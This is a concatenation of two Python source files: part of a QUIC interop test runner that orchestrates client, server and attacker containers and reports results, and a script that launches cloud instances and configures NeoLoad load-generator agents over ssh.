result = TestResult
details = str
class LogFileFormatter(logging.Formatter):
def format(self, record):
msg = super(LogFileFormatter, self).format(record)
# remove color control characters
return re.compile(r"\x1B[@-_][0-?]*[ -/]*[@-~]").sub("", msg)
class InteropRunner:
_start_time = 0
test_results = {}
measurement_results = {}
attack_results = {}
compliant = {}
_implementations = {}
_servers = []
_clients = []
_attackers = []
_tests = []
_measurements = []
_attacks = []
_output = ""
_log_dir = ""
_save_files = False
def __init__(
self,
implementations: dict,
servers: List[str],
clients: List[str],
attackers: List[str],
tests: List[testcases.TestCase],
attacks: List[attacks.Attack],
measurements: List[testcases.Measurement],
output: str,
debug: bool,
save_files=False,
log_dir="",
):
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
console = logging.StreamHandler(stream=sys.stderr)
if debug:
console.setLevel(logging.DEBUG)
else:
console.setLevel(logging.INFO)
logger.addHandler(console)
self._start_time = datetime.now()
self._tests = tests
self._measurements = measurements
self._attacks = attacks
self._servers = servers
self._clients = clients
self._attackers = attackers
self._implementations = implementations
self._output = output
self._log_dir = log_dir
self._save_files = save_files
if len(self._log_dir) == 0:
self._log_dir = "logs_{:%Y-%m-%dT%H:%M:%S}".format(self._start_time)
if os.path.exists(self._log_dir):
sys.exit("Log dir " + self._log_dir + " already exists.")
logging.info("Saving logs to %s.", self._log_dir)
for server in servers:
self.test_results[server] = {}
self.measurement_results[server] = {}
for client in clients:
self.test_results[server][client] = {}
for test in self._tests:
self.test_results[server][client][test] = {}
self.measurement_results[server][client] = {}
for measurement in measurements:
self.measurement_results[server][client][measurement] = {}
#Last for cycle could be reused for better performance rather then readability
attack_targets = [a for a in AttackTarget]
for target in attack_targets:
target_str = target.value
self.attack_results[target_str] = {}
for attacker in attackers:
self.attack_results[target_str][attacker] = {}
if target == AttackTarget.CLIENT:
for client in clients:
self.attack_results[target_str][attacker][client] = {}
if target == AttackTarget.SERVER or target == AttackTarget.BOTH:
for server in servers:
self.attack_results[target_str][attacker][server] = {}
if target == AttackTarget.BOTH:
self.attack_results[target_str][attacker][server][client] = {}
def _is_unsupported(self, lines: List[str]) -> bool:
return any("exited with code 127" in str(line) for line in lines) or any(
"exit status 127" in str(line) for line in lines
)
def _check_impl_is_compliant(self, name: str) -> bool:
""" check if an implementation return UNSUPPORTED for unknown test cases """
if name in self.compliant:
logging.debug(
"%s already tested for compliance: %s", name, str(self.compliant)
)
return self.compliant[name]
client_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_client_")
www_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="compliance_www_")
certs_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="compliance_certs_")
downloads_dir = tempfile.TemporaryDirectory(
dir="/tmp", prefix="compliance_downloads_"
)
testcases.generate_cert_chain(certs_dir.name)
# check that the client is capable of returning UNSUPPORTED
logging.debug("Checking compliance of %s client", name)
cmd = (
"CERTS=" + certs_dir.name + " "
"TESTCASE_CLIENT=" + random_string(6) + " "
"SERVER_LOGS=/dev/null "
"CLIENT_LOGS=" + client_log_dir.name + " "
"WWW=" + www_dir.name + " "
"DOWNLOADS=" + downloads_dir.name + " "
'SCENARIO="simple-p2p --delay=15ms --bandwidth=10Mbps --queue=25" '
"CLIENT=" + self._implementations[name]["image"] + " "
"docker-compose up --timeout 0 --abort-on-container-exit -V sim client"
)
output = subprocess.run(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
if not self._is_unsupported(output.stdout.splitlines()):
logging.error("%s client not compliant.", name)
logging.debug("%s", output.stdout.decode("utf-8"))
self.compliant[name] = False
return False
logging.debug("%s client compliant.", name)
# check that the server is capable of returning UNSUPPORTED
logging.debug("Checking compliance of %s server", name)
server_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_server_")
cmd = (
"CERTS=" + certs_dir.name + " "
"TESTCASE_SERVER=" + random_string(6) + " "
"SERVER_LOGS=" + server_log_dir.name + " "
"CLIENT_LOGS=/dev/null "
"WWW=" + www_dir.name + " "
"DOWNLOADS=" + downloads_dir.name + " "
"SERVER=" + self._implementations[name]["image"] + " "
"docker-compose up -V server"
)
output = subprocess.run(
cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
if not self._is_unsupported(output.stdout.splitlines()):
logging.error("%s server not compliant.", name)
logging.debug("%s", output.stdout.decode("utf-8"))
self.compliant[name] = False
return False
logging.debug("%s server compliant.", name)
# remember compliance test outcome
self.compliant[name] = True
return True
def _print_results(self):
"""print the interop table"""
logging.info("Run took %s", datetime.now() - self._start_time)
def get_letters(result):
return "".join(
[test.abbreviation() for test in cell if cell[test] is result]
)
if len(self._tests) > 0:
t = prettytable.PrettyTable()
t.hrules = prettytable.ALL
t.vrules = prettytable.ALL
t.field_names = [""] + [name for name in self._servers]
for client in self._clients:
row = [client]
for server in self._servers:
cell = self.test_results[server][client]
res = colored(get_letters(TestResult.SUCCEEDED), "green") + "\n"
res += colored(get_letters(TestResult.UNSUPPORTED), "grey") + "\n"
res += colored(get_letters(TestResult.FAILED), "red")
row += [res]
t.add_row(row)
print(t)
if len(self._measurements) > 0:
t = prettytable.PrettyTable()
t.hrules = prettytable.ALL
t.vrules = prettytable.ALL
t.field_names = [""] + [name for name in self._servers]
for client in self._clients:
row = [client]
for server in self._servers:
cell = self.measurement_results[server][client]
results = []
for measurement in self._measurements:
res = cell[measurement]
if not hasattr(res, "result"):
continue
if res.result == TestResult.SUCCEEDED:
results.append(
colored(
measurement.abbreviation() + ": " + res.details,
"green",
)
)
elif res.result == TestResult.UNSUPPORTED:
results.append(colored(measurement.abbreviation(), "grey"))
elif res.result == TestResult.FAILED:
results.append(colored(measurement.abbreviation(), "red"))
row += ["\n".join(results)]
t.add_row(row)
print(t)
if len(self._attacks) > 0:
t = prettytable.PrettyTable()
t.hrules = prettytable.ALL
t.vrules = prettytable.ALL
t.field_names = [""] + [name for name in self._servers]
for attacker in self._attackers:
row = [attacker]
#for client in self._clients:
# row = [client]
for server in self._servers:
for attack in self._attacks:
cell = self.attack_results[attack.target().value][attacker][server]
res = colored(get_letters(TestResult.SUCCEEDED), "green") + "\n"
res += colored(get_letters(TestResult.UNSUPPORTED), "grey") + "\n"
res += colored(get_letters(TestResult.FAILED), "red")
row += [res]
t.add_row(row)
print(t)
def _export_results(self):
if not self._output:
return
out = {
"start_time": self._start_time.timestamp(),
"end_time": datetime.now().timestamp(),
"log_dir": self._log_dir,
"servers": [name for name in self._servers],
"clients": [name for name in self._clients],
"attackers": [name for name in self._attackers],
"urls": {
x: self._implementations[x]["url"]
for x in self._servers + self._clients + self._attackers
},
"tests": {
x.abbreviation(): {
"name": x.name(),
"desc": x.desc(),
}
for x in self._tests + self._measurements
},
"attacks": {
x.abbreviation(): {
"name": x.name(),
"desc": x.desc(),
"target": x.target().value
}
for x in self._attacks
},
"quic_draft": testcases.QUIC_DRAFT,
"quic_version": testcases.QUIC_VERSION,
"results": [],
"attack_results": {},
"measurements": [],
}
for target in AttackTarget:
out["attack_results"][target.value] = []
for client in self._clients:
for server in self._servers:
results = []
for test in self._tests:
r = None
if hasattr(self.test_results[server][client][test], "value"):
r = self.test_results[server][client][test].value
results.append(
{
"abbr": test.abbreviation(),
"name": test.name(), # TODO: remove
"result": r,
}
)
out["results"].append(results)
measurements = []
for measurement in self._measurements:
res = self.measurement_results[server][client][measurement]
if not hasattr(res, "result"):
continue
measurements.append(
{
"name": measurement.name(), # TODO: remove
"abbr": measurement.abbreviation(),
"result": res.result.value,
"details": res.details,
}
)
out["measurements"].append(measurements)
for attacker in self._attackers:
for server in self._servers:
attk_results = []
for attack in self._attacks:
r = None
result_table = {}
target = attack.target()
if target == AttackTarget.SERVER:
result_table = self.attack_results[target.value][attacker][server]
elif target == AttackTarget.CLIENT: #TODO: make it work
result_table = self.attack_results[target.value][attacker][client]
elif target == AttackTarget.BOTH: #TODO: make it work
result_table = self.attack_results[target.value][attacker][server][client]
if hasattr(result_table[attack], "value"):
r = result_table[attack].value
#In case an error occured
if r == None:
r = TestResult.UNSUPPORTED
attk_results.append(
{
"abbr": attack.abbreviation(),
"name": attack.name(), # TODO: remove
"result": r,
}
)
out["attack_results"][attack.target().value].append(attk_results)
f = open(self._output, "w")
json.dump(out, f)
f.close()
def _copy_logs(self, container: str, dir: tempfile.TemporaryDirectory):
r = subprocess.run(
'docker cp "$(docker-compose --log-level ERROR ps -q '
+ container
+ ')":/logs/. '
+ dir.name,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
if r.returncode != 0:
logging.info(
"Copying logs from %s failed: %s", container, r.stdout.decode("utf-8")
)
def _run_testcase(
self, server: str, client: str, test: Callable[[], testcases.TestCase]
) -> TestResult:
return self._run_test(server, client, None, test)[0]
def _run_test(
self,
server: str,
client: str,
log_dir_prefix: None,
test: Callable[[], testcases.TestCase],
) -> Tuple[TestResult, float]:
start_time = datetime.now()
sim_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_sim_")
server_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_server_")
client_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_client_")
log_file = tempfile.NamedTemporaryFile(dir="/tmp", prefix="output_log_")
log_handler = logging.FileHandler(log_file.name)
log_handler.setLevel(logging.DEBUG)
formatter = LogFileFormatter("%(asctime)s %(message)s")
log_handler.setFormatter(formatter)
logging.getLogger().addHandler(log_handler)
testcase = test(
sim_log_dir=sim_log_dir,
client_keylog_file=client_log_dir.name + "/keys.log",
server_keylog_file=server_log_dir.name + "/keys.log",
)
print(
"Server: "
+ server
+ ". Client: "
+ client
+ ". Running test case: "
+ str(testcase)
)
reqs = " ".join([testcase.urlprefix() + p for p in testcase.get_paths()])
logging.debug("Requests: %s", reqs)
params = (
"WAITFORSERVER=server:443 "
"CERTS=" + testcase.certs_dir() + " "
"TESTCASE_SERVER=" + testcase.testname(Perspective.SERVER) + " "
"TESTCASE_CLIENT=" + testcase.testname(Perspective.CLIENT) + " "
"WWW=" + testcase.www_dir() + " "
"DOWNLOADS=" + testcase.download_dir() + " "
"SERVER_LOGS=" + server_log_dir.name + " "
"CLIENT_LOGS=" + client_log_dir.name + " "
'SCENARIO="{}" '
"CLIENT=" + self._implementations[client]["image"] + " "
"SERVER=" + self._implementations[server]["image"] + " "
'REQUESTS="' + reqs + '" '
'VERSION="' + testcases.QUIC_VERSION + '" '
).format(testcase.scenario())
params += " ".join(testcase.additional_envs())
containers = "sim client server " + " ".join(testcase.additional_containers())
cmd = (
params
+ " docker-compose up --abort-on-container-exit --timeout 1 "
+ containers
)
logging.debug("Command: %s", cmd)
status = TestResult.FAILED
output = ""
expired = False
try:
r = subprocess.run(
cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=testcase.timeout(),
)
output = r.stdout
except subprocess.TimeoutExpired as ex:
output = ex.stdout
expired = True
logging.debug("%s", output.decode("utf-8"))
if expired:
logging.debug("Test failed: took longer than %ds.", testcase.timeout())
r = subprocess.run(
"docker-compose stop " + containers,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=60,
)
logging.debug("%s", r.stdout.decode("utf-8"))
# copy the pcaps from the simulator
self._copy_logs("sim", sim_log_dir)
self._copy_logs("client", client_log_dir)
self._copy_logs("server", server_log_dir)
if not expired:
lines = output.splitlines()
if self._is_unsupported(lines):
status = TestResult.UNSUPPORTED
elif any("client exited with code 0" in str(line) for line in lines):
try:
status = testcase.check()
except FileNotFoundError as e:
logging.error(f"testcase.check() threw FileNotFoundError: {e}")
status = TestResult.FAILED
# save logs
logging.getLogger().removeHandler(log_handler)
log_handler.close()
if status == TestResult.FAILED or status == TestResult.SUCCEEDED:
log_dir = self._log_dir + "/" + server + "_" + client + "/" + str(testcase)
if log_dir_prefix:
log_dir += "/" + log_dir_prefix
shutil.copytree(server_log_dir.name, log_dir + "/server")
shutil.copytree(client_log_dir.name, log_dir + "/client")
shutil.copytree(sim_log_dir.name, log_dir + "/sim")
shutil.copyfile(log_file.name, log_dir + "/output.txt")
if self._save_files and status == TestResult.FAILED:
shutil.copytree(testcase.www_dir(), log_dir + "/www")
try:
shutil.copytree(testcase.download_dir(), log_dir + "/downloads")
except Exception as exception:
logging.info("Could not copy downloaded files: %s", exception)
testcase.cleanup()
server_log_dir.cleanup()
client_log_dir.cleanup()
sim_log_dir.cleanup()
logging.debug("Test took %ss", (datetime.now() - start_time).total_seconds())
# measurements also have a value
if hasattr(testcase, "result"):
value = testcase.result()
else:
value = None
return status, value
def _run_measurement(
self, server: str, client: str, test: Callable[[], testcases.Measurement]
) -> MeasurementResult:
values = []
for i in range(0, test.repetitions()):
result, value = self._run_test(server, client, "%d" % (i + 1), test)
if result != TestResult.SUCCEEDED:
res = MeasurementResult()
res.result = result
res.details = ""
return res
values.append(value)
logging.debug(values)
res = MeasurementResult()
res.result = TestResult.SUCCEEDED
res.details = "{:.0f} (± {:.0f}) {}".format(
statistics.mean(values), statistics.stdev(values), test.unit()
)
return res
def _run_attack(
self,
server: str,
client: str,
attacker: str,
attack: Callable[[], attacks.Attack],
log_dir_prefix: None,
) -> Tuple[TestResult, float]:
start_time = datetime.now()
sim_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_sim_")
server_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_server_")
client_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_client_")
attacker_log_dir = tempfile.TemporaryDirectory(dir="/tmp", prefix="logs_attacker_")
log_file = tempfile.NamedTemporaryFile(dir="/tmp", prefix="output_log_")
log_handler = logging.FileHandler(log_file.name)
log_handler.setLevel(logging.DEBUG)
formatter = LogFileFormatter("%(asctime)s %(message)s")
log_handler.setFormatter(formatter)
logging.getLogger().addHandler(log_handler)
testcase = attack(
sim_log_dir=sim_log_dir,
attacker_log_dir=attacker_log_dir,
client_keylog_file=client_log_dir.name + "/keys.log",
server_keylog_file=server_log_dir.name + "/keys.log",
)
additional_print = ""
if attack.target() != AttackTarget.SERVER:
additional_print = ". Client: "+ client
print(
"Server: "
+ server
+ additional_print
+ ". Running attack: "
+ str(testcase)
)
reqs = " ".join([testcase.urlprefix() + p for p in testcase.get_paths()])
logging.debug("Requests: %s", reqs)
params = (
"WAITFORSERVER=server:443 "
"CERTS=" + testcase.certs_dir() + " "
"TESTCASE_SERVER=" + testcase.testname(Perspective.SERVER) + " "
"TESTCASE_CLIENT=" + testcase.testname(Perspective.CLIENT) + " "
"WWW=" + testcase.www_dir() + " "
"DOWNLOADS=" + testcase.download_dir() + " "
"SERVER_LOGS=" + server_log_dir.name + " "
"CLIENT_LOGS=" + client_log_dir.name + " "
'SCENARIO="{}" '
"ATTACKER="+ self._implementations[attacker]["image"] + " "
"ATTACK="+ testcase.name() + " "
"CLIENT=" + self._implementations[client]["image"] + " "
"SERVER=" + self._implementations[server]["image"] + " "
'REQUESTS="' + reqs + '" '
'VERSION="' + testcases.QUIC_VERSION + '" '
).format(testcase.scenario())
params += " ".join(testcase.additional_envs())
containers = "sim client server attacker" + " ".join(testcase.additional_containers())
cmd = (
params
+ " docker-compose up --timeout 1 "
+ containers
)
logging.debug("Command: %s", cmd)
attk_name = attack.name()
res_logger = threading.Thread(target=log_resources, args=(attk_name,"server", attacker_log_dir))
res_logger.start()
status = TestResult.FAILED
output = ""
expired = False
try:
r = subprocess.run(
cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=testcase.timeout(),
)
output = r.stdout
except subprocess.TimeoutExpired as ex:
output = ex.stdout
expired = True
logging.debug("%s", output.decode("utf-8"))
res_logger.join(timeout=0.1)
if expired:
logging.debug("Attack ended after %ds.", testcase.timeout())
r = subprocess.run(
"docker-compose stop " + containers,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
timeout=60,
)
logging.debug("%s", r.stdout.decode("utf-8"))
# copy the pcaps from the simulator
self._copy_logs("sim", sim_log_dir)
self._copy_logs("client", client_log_dir)
self._copy_logs("server", server_log_dir)
self._copy_logs("attacker", attacker_log_dir)
lines = output.splitlines()
if self._is_unsupported(lines):
status = TestResult.UNSUPPORTED
else:
try:
status = testcase.check()
except FileNotFoundError as e:
logging.error(f"testcase.check() threw FileNotFoundError: {e}")
status = TestResult.FAILED
# save logs
logging.getLogger().removeHandler(log_handler)
log_handler.close()
if status == TestResult.FAILED or status == TestResult.SUCCEEDED:
config = attacker + "_" + server
if attack.target() != AttackTarget.SERVER:
config += "_" + client
log_dir = self._log_dir + "/" + config + "/" + str(testcase)
if log_dir_prefix:
log_dir += "/" + log_dir_prefix
shutil.copytree(server_log_dir.name, log_dir + "/server")
shutil.copytree(client_log_dir.name, log_dir + "/client")
shutil.copytree(sim_log_dir.name, log_dir + "/sim")
shutil.copytree(attacker_log_dir.name, log_dir + "/attacker")
shutil.copyfile(log_file.name, log_dir + "/output.txt")
if self._save_files and status == TestResult.FAILED:
shutil.copytree(testcase.www_dir(), log_dir + "/www")
try:
shutil.copytree(testcase.download_dir(), log_dir + "/downloads")
except Exception as exception:
logging.info("Could not copy downloaded files: %s", exception)
testcase.cleanup()
server_log_dir.cleanup()
client_log_dir.cleanup()
sim_log_dir.cleanup()
#attacker_log_dir.cleanup()
logging.debug("Test took %ss", (datetime.now() - start_time).total_seconds())
# measurements also have a value
if hasattr(testcase, "result"):
value = testcase.result()
else:
value = None
return status, value
def run(self):
"""run the interop test suite and output the table"""
nr_failed = 0
for server in self._servers:
for client in self._clients:
logging.debug(
"Running with server %s (%s) and client %s (%s)",
server,
self._implementations[server]["image"],
client,
self._implementations[client]["image"],
)
if not (
self._check_impl_is_compliant(server)
and self._check_impl_is_compliant(client)
):
logging.info("Not compliant, skipping")
continue
# run the test cases
for testcase in self._tests:
status = self._run_testcase(server, client, testcase)
self.test_results[server][client][testcase] = status
if status == TestResult.FAILED:
nr_failed += 1
# run the measurements
for measurement in self._measurements:
res = self._run_measurement(server, client, measurement)
self.measurement_results[server][client][measurement] = res
for attacker in self._attackers:
for server in self._servers:
# run the attacks
for attack in self._attacks:
status = self._run_attack(server, client, attacker, attack, None)[0]
self.attack_results[attack.target().value][attacker][server][attack] = status #todo: make it work on any target
self._print_results()
self._export_results()
return nr_failed
|
launchAgents.py
|
#!/usr/bin/env python3
'''launches new NCS instances and starts the NeoLoad LoadGenerator agent on them'''
import argparse
from concurrent import futures
import datetime
import json
import logging
import os
import subprocess
import sys
import time
# third-party module(s)
import requests
# neocortix modules
import ncscli.ncs as ncs
import ncscli.batchRunner as batchRunner
import ncscli.tellInstances as tellInstances
import startForwarders # expected to be in the same directory
neoloadVersion = '7.11.2' # will be overridden by cmd-line arg
nlWebWanted = False
class g_:
signaled = False
interrupted = False
def readJLog( inFilePath ):
'''read JLog file, return list of decoded objects'''
recs = []
# read and decode each line as json
try:
with open( inFilePath, 'rb' ) as inFile:
for line in inFile:
try:
decoded = json.loads( line )
except Exception as exc:
logger.warning( 'exception decoding json (%s) %s', type(exc), exc )
recs.append( decoded )
except Exception as exc:
logger.warning( 'exception reading file (%s) %s', type(exc), exc )
return recs
def scriptDirPath():
'''returns the absolute path to the directory containing this script'''
return os.path.dirname(os.path.realpath(__file__))
def truncateVersion( nlVersion ):
'''drop patch-level part of version number, if any'''
return '.'.join(nlVersion.split('.')[:-1]) if nlVersion.count('.') > 1 else nlVersion
class neoloadFrameProcessor(batchRunner.frameProcessor):
'''defines details for installing Neotys Load Generator agent on a worker'''
def installerCmd( self ):
truncVersion = truncateVersion( neoloadVersion )
scoredVersion = neoloadVersion.replace( '.', '_' )
if neoloadVersion == '7.10':
return 'nlAgent/install_7-10_slim.sh'
elif neoloadVersion == '7.7':
return 'nlAgent/install_7-7.sh'
elif neoloadVersion == '7.6':
return 'nlAgent/install_7-6.sh'
else:
return 'nlAgent/install_7-x.sh %s %s %s' % (neoloadVersion, truncVersion, scoredVersion )
def sigtermSignaled():
return g_.signaled
def commandInstance( inst, cmd, timeLimit ):
deadline = time.time() + timeLimit
sshSpecs = inst['ssh']
#logInstallerOperation( iid, ['connect', sshSpecs['host'], sshSpecs['port']] )
with subprocess.Popen(['ssh',
'-p', str(sshSpecs['port']),
'-o', 'ServerAliveInterval=30',
'-o', 'ServerAliveCountMax=12',
sshSpecs['user'] + '@' + sshSpecs['host'], cmd],
encoding='utf8',
#stdout=subprocess.PIPE, # subprocess.PIPE subprocess.DEVNULL
) as proc: # stderr=subprocess.PIPE
#logInstallerOperation( iid, ['command', cmd] )
#stderrThr = threading.Thread(target=trackStderr, args=(proc,))
#stderrThr.start()
abbrevIid = inst['instanceId'][0:16]
while time.time() < deadline:
proc.poll() # sets proc.returncode
if proc.returncode == None:
logger.debug( 'waiting for command on instance %s', abbrevIid)
else:
if proc.returncode == 0:
logger.debug( 'command succeeded on instance %s', abbrevIid )
else:
logger.warning( 'instance %s gave returnCode %d', abbrevIid, proc.returncode )
break
if sigtermSignaled():
break
if g_.interrupted:
break
time.sleep(5)
proc.poll()
returnCode = proc.returncode if proc.returncode != None else 124 # declare timeout if no rc
#if returnCode:
# logger.warning( 'command returnCode %s', returnCode )
#if returnCode == 124:
# logInstallerEvent( 'timeout', args.instTimeLimit, iid )
#else:
# logInstallerEvent('returncode', returnCode, iid )
proc.terminate()
try:
proc.wait(timeout=5)
if proc.returncode:
logger.debug( 'ssh return code %d', proc.returncode )
except subprocess.TimeoutExpired:
logger.warning( 'ssh did not terminate in time' )
#stderrThr.join()
if returnCode:
#logger.warning( 'terminating instance because installerFailed %s', iid )
#terminateInstances( args.authToken, [iid] )
#logOperation( 'terminateBad', [iid], '<recruitInstances>' )
#purgeHostKeys( [inst] )
return returnCode
else:
return 0
return 1
def configureAgent( inst, port, timeLimit=500 ):
iid = inst['instanceId']
logger.debug( 'would configure agent on instance %s for port %d', iid[0:16], port )
rc = 1
# drop patch-level part of version number, if any
truncatedVersion = truncateVersion( neoloadVersion )
# generate a command to modify agent.properties on the instance
configDirPath = '~/neoload%s/conf' % truncatedVersion
if nlWebWanted:
cmd = "cat %s/nlweb.properties >> %s/agent.properties" % tuple( [configDirPath]*2 )
else:
cmd = ":" # a null command
cmd += " && sed -i 's/NCS_LG_PORT/%d/' %s/agent.properties" % (port, configDirPath)
cmd += " && sed -i 's/NCS_LG_HOST/%s/' %s/agent.properties" % (forwarderHost, configDirPath)
if nlWebWanted:
# deployment type for nlweb
dtype = 'SAAS' if args.nlWebUrl == 'SAAS' else 'ONPREMISE'
cmd += " && sed -i 's/NCS_NLWEB_DTYPE/%s/g' %s/agent.properties" % (dtype, configDirPath)
# zone for nlweb
cmd += " && sed -i 's/NCS_NLWEB_ZONE/%s/g' %s/agent.properties" % (args.nlWebZone, configDirPath)
escapedUrl = args.nlWebUrl.replace( '/', '\/' )
cmd += " && sed -i 's/NCS_NLWEB_TOKEN/%s/g' %s/agent.properties" % (args.nlWebToken, configDirPath)
cmd += " && sed -i 's/NCS_NLWEB_URL/%s/' %s/agent.properties" % (escapedUrl, configDirPath)
logger.debug( 'info: %s', cmd )
rc = commandInstance( inst, cmd, timeLimit=timeLimit )
return rc
def configureAgents( instances, ports, timeLimit=600 ):
'''configure LG agents, in parallel'''
returnCodes = []
with futures.ThreadPoolExecutor( max_workers=len(instances) ) as executor:
parIter = executor.map( configureAgent, instances, ports, timeout=timeLimit )
returnCodes = [None] * len(instances)
try:
index = 0
for returnCode in parIter:
returnCodes[index] = returnCode
index += 1
time.sleep( .1 )
except KeyboardInterrupt:
logger.warning( 'interrupted, setting flag')
g_.interrupted = True
raise
logger.debug( 'returnCodes: %s', returnCodes )
return returnCodes
def purgeHostKeys( instanceRecs ):
'''try to purgeKnownHosts; warn if any exception'''
logger.debug( 'purgeKnownHosts for %d instances', len(instanceRecs) )
try:
ncs.purgeKnownHosts( instanceRecs )
except Exception as exc:
logger.warning( 'exception from purgeKnownHosts (%s) %s', type(exc), exc, exc_info=True )
return 1
else:
return 0
if __name__ == '__main__':
# configure logger formatting
logger = logging.getLogger(__name__)
logFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'
logDateFmt = '%Y/%m/%d %H:%M:%S'
formatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )
logging.basicConfig(format=logFmt, datefmt=logDateFmt)
#batchRunner.logger.setLevel(logging.DEBUG) # for more verbosity
#startForwarders.logger.setLevel(logging.DEBUG) # for more verbosity
logger.setLevel(logging.INFO)
ap = argparse.ArgumentParser( description=__doc__, fromfile_prefix_chars='@',
formatter_class=argparse.ArgumentDefaultsHelpFormatter )
ap.add_argument( '--authToken', help='the NCS authorization token to use (or none, to use NCS_AUTH_TOKEN env var' )
ap.add_argument( '--filter', help='json to filter instances for launch',
default = '{ "regions": ["asia", "europe", "middle-east", "north-america", "oceania"], "dar": ">=99", "dpr": ">=48", "ram": ">=3800000000", "storage": ">=2000000000" }'
)
ap.add_argument( '--sshClientKeyName', help='the name of the uploaded ssh client key to use (default is random)' )
ap.add_argument( '--forwarderHost', help='IP addr (or host name) of the forwarder host',
default='localhost' )
ap.add_argument( '--neoloadVersion', default=neoloadVersion, help='version of neoload LG agent' )
ap.add_argument( '--nlWeb', type=ncs.boolArg, default=False, help='whether to use NeoLoad Web' )
ap.add_argument( '--nlWebToken', help='a token for authorized access to a neoload web server' )
ap.add_argument( '--nlWebUrl', help='the URL of a neoload web server to query' )
ap.add_argument( '--nlWebZone', help='the neoload zone that the agents should belong to',
default='defaultzone' )
ap.add_argument( '--nWorkers', type=int, help='the number of agents to launch',
default=10 )
ap.add_argument( '--outDataDir', required=False, help='a path to the output data dir for this run' )
ap.add_argument( '--portRangeStart', type=int, default=7100,
help='the beginning of the range of port numbers to forward' )
ap.add_argument( '--supportedVersions', action='store_true', help='to list supported versions and exit' )
ap.add_argument( '--cookie' )
args = ap.parse_args()
supportedVersions = ['7.9.2', '7.10.2', '7.11.2', '8.0.0']
if args.supportedVersions:
print( json.dumps( supportedVersions ) )
sys.exit( 0 )
neoloadVersion = args.neoloadVersion
if neoloadVersion not in supportedVersions:
logger.error( 'version "%s" is not suppoprted; supported versions are %s',
neoloadVersion, sorted( supportedVersions ) )
sys.exit( 1 )
nlWebWanted = args.nlWeb
if nlWebWanted:
# make sure all the necessary nlWeb args were passed in non-empty
if not args.nlWebToken:
logger.error( 'please pass a non-empty --nlWebToken if you want to use NeoLoad Web')
if not args.nlWebUrl:
logger.error( 'please pass a non-empty --nlWebUrl if you want to use NeoLoad Web')
if not (args.nlWebUrl and args.nlWebUrl):
sys.exit( 1 )
outDataDir = args.outDataDir
if not outDataDir:
dateTimeTag = datetime.datetime.now().strftime( '%Y-%m-%d_%H%M%S' )
outDataDir = 'data/neoload_' + dateTimeTag
# you may set forwarderHost manually here, to override auto-detect
forwarderHost = args.forwarderHost
if not forwarderHost:
try:
forwarderHost = requests.get( 'https://api.ipify.org' ).text
except forwarderHost:
logger.warning( 'could not get public ip addr of this host')
if not forwarderHost:
logger.error( 'forwarderHost not set')
exit(1)
authToken = args.authToken or os.getenv('NCS_AUTH_TOKEN')
instTimeLimit = 11*60 # if neoloadVersion in ['7.10'] else 30*60
nlAgentDirName = 'nlAgent'
if not os.path.isdir( nlAgentDirName ):
if os.path.exists( nlAgentDirName ) and not os.path.islink( nlAgentDirName ):
logger.error( 'you have an nlAgent that is neither a dir nor a symlink')
sys.exit( 1 )
targetPath = os.path.join( scriptDirPath(), nlAgentDirName )
if not os.path.isdir( targetPath ):
logger.error( 'nlAgent dir not found in %s', scriptDirPath() )
sys.exit( 1 )
try:
os.symlink( targetPath, nlAgentDirName, target_is_directory=True )
except Exception as exc:
logger.error( 'could not create symlink for nlAgent (%s) %s', type(exc), exc)
sys.exit( 1 )
logger.debug( 'nlAgent contents: %s', os.listdir(nlAgentDirName) )
if nlWebWanted and not os.path.isfile( 'nlAgent/nlweb.properties'):
logger.error( 'the file nlAgent/nlweb.properties was not found')
sys.exit(1)
try:
# call runBatch to launch worker instances and install the load generator agent on them
rc = batchRunner.runBatch(
frameProcessor = neoloadFrameProcessor(),
recruitOnly=True,
pushDeviceLocs=False,
commonInFilePath = 'nlAgent',
authToken = authToken,
cookie = args.cookie,
sshClientKeyName=args.sshClientKeyName,
encryptFiles=False,
timeLimit = 60*60,
instTimeLimit = instTimeLimit,
filter = args.filter,
outDataDir = outDataDir,
nWorkers = args.nWorkers
)
if rc == 0:
# get iids of instances successfully installed
recruiterJlogFilePath = os.path.join( outDataDir, 'recruitInstances.jlog' )
recruitedIids = []
if os.path.isfile( recruiterJlogFilePath ):
recruiterResults = readJLog( recruiterJlogFilePath )
if not recruiterResults:
logger.warning( 'no entries in %s', recruiterJlogFilePath )
for result in recruiterResults:
if 'timeout' in result:
logger.debug( 'recruiter timeout: %s', result )
elif 'returncode' in result:
if result['returncode'] != 0:
logger.debug( 'recruiter result: %s', result )
else:
recruitedIids.append( result.get( 'instanceId' ) )
recruitedIids = set( recruitedIids )
logger.debug( '%d recruitedIids: %s', len(recruitedIids), recruitedIids )
portRangeStart=args.portRangeStart
launchedJsonFilePath = outDataDir +'/recruitLaunched.json'
launchedInstances = []
# get details of launched instances from the json file
with open( launchedJsonFilePath, 'r') as jsonInFile:
try:
launchedInstances = json.load(jsonInFile) # an array
except Exception as exc:
logger.warning( 'could not load json (%s) %s', type(exc), exc )
sys.exit( 2 )
launchedIids = [inst['instanceId'] for inst in launchedInstances ]
#startedInstances = [inst for inst in launchedInstances if inst['state'] == 'started' ]
#logger.info( '%d instances were launched', len(startedInstances) )
startedInstances = [inst for inst in launchedInstances if inst['instanceId'] in recruitedIids ]
#COULD check memory and available ports here
